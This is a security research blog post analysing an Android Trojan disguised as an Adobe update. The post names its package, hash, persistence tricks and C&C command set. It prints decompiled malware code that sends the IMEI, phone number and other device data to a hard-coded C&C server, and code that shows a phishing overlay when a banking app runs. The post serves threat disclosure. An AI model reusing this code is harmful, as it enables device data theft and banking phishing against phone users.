Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have been permeating into every corner of the world. After years of rapid growth, their popularity and usefulness reaches that of personal computers. Besides calling and texting, it is becoming more popular for people to do daily banking on their smartphone. With the computing capability, some traditional malware are shifting into the world of smartphones. They compromise the smartphone, change the phone behavior, and receive instructions from the remote attacker to steal user’s information.

One of these examples is a newly discovered malicious app named “Adobe Update”, which has the package name “droid.invisible”. It is a phishing Trojan that targets the android platform.

The sample’s MD5 is : D8616CDD54154B06A5E4D9D5B2A605E5
The package icon is::

Picture1

In virustotal among 57 antivirus vendors, only 3 vendors detected them when initially submitted.

vt

The malware conceals its own developer certificate information behind a reputable enterprise :

malware_cert

 

Yet the official com.adobe.reader app in Google Play is of this correct developer certificate:

adobe_cert

Upon installation, this malware presents the user with a misleading setup dialog box while replacing the default SMS app:

sms

The app displays messages to entice user to grant the device admin to maintain the persistence on the system:

admin

The app cannot be uninstalled by the normal means:

uninstall

The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level

pcap

The following code snippets demonstrate the above behaviours:

 

classimplements Runnable

[…]

Thread.sleep(20000L);

Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] – SEND MOBILE DATA”);

a.a.a.a.a locala = new a.a.a.a.a();

x localx = new x();

TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService(“phone”);

localx.a(“id”, localTelephonyManager.getDeviceId());

localx.a(“country”, localTelephonyManager.getNetworkCountryIso());

localx.a(“opname”, localTelephonyManager.getNetworkOperatorName());

localx.a(“osversion”, System.getProperty(“os.version”) + “(” + Build.VERSION.INCREMENTAL + “)”);

localx.a(“osapilevel”, Build.VERSION.RELEASE + “(” + Build.VERSION.SDK_INT + “)”);

localx.a(“device”, Build.DEVICE);

localx.a(“model”, Build.MODEL + ” (” + Build.PRODUCT + “)”);

localx.a(“pnumber”, localTelephonyManager.getLine1Number());

localx.a(“botid”, “777”);

locala.a(“http://94.140.120.183/gate/receive.php”, localx, new b(this));

[…]

Furthermore, the malware receives command instructions from the C&C server to perform various functions:

  • loop  // wait for next command
  • sms  // send sms message
  • readsms  // retrieve sms message and send to the C&C server
  • ion // the function is not implemented, write to log file
  • ioff // same as above
  • recall // call received numbers.
  • fish // show an attacker controlled web page when a specific foreground running app is found.

The following code snippets demonstrate the malware checks for the received parameters and shows a phishing web page:

if (paramArrayOfByte[0].equals(“fish”)) // compare command name

{

Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] :: FISH”);

this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra(“data”, paramArrayOfByte[1]));

}

[…]

public class InjectionScanner extends Service

{

int a = 0;

String b;

public String a()

{

return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName; // get foreground running process name

}

public void a(String paramString)

{

paramString = new Thread(new g(this, paramString));

paramString.setDaemon(true);

paramString.start();

}

[…]

public class InjectionScanner extends Service

{

int a = 0;

String b;

public String a()

{

return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName;

}

[…]

public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)

{

this.b = paramIntent.getStringExtra(“data”);

a();

a(this.b);

return paramInt1;

[…]

(this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray(“apps”).getString(j))) // compare the foreground running app name with received string

{

Intent localIntent = new Intent(this.b, InjectionActivity.class);

localIntent.addFlags(268435456);

localIntent.putExtra(“injection”, localJSONObject.names().getString(i));

this.b.startActivity(localIntent);

this.b.a = 1;

[…]

@SuppressLint({“SetJavaScriptEnabled”})

protected void onCreate(Bundle paramBundle)

{

super.onCreate(paramBundle);

setContentView(2130968604);

paramBundle = (TelephonyManager)getSystemService(“phone”);

Intent localIntent = getIntent();

WebView localWebView = (WebView)findViewById(2131492971);

localWebView.getSettings().setJavaScriptEnabled(true);

localWebView.setWebViewClient(new f(this, null));

localWebView.setWebChromeClient(new e(this, null));

localWebView.loadUrl(“http://94.140.120.183/injections/?bank=” + localIntent.getStringExtra(“injection”) + “&imei=” + paramBundle.getDeviceId()); // show phishing web page

}

}

The malware displays phishing web page when a specific app is found, for example, the banking app. The fraudsters persuade gullible users to enter their financial details and harvest all the information.

The C&C server 94.140.120.183 is located in Latvia:

http://whois.domaintools.com/94.140.120.183

 

latvia

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s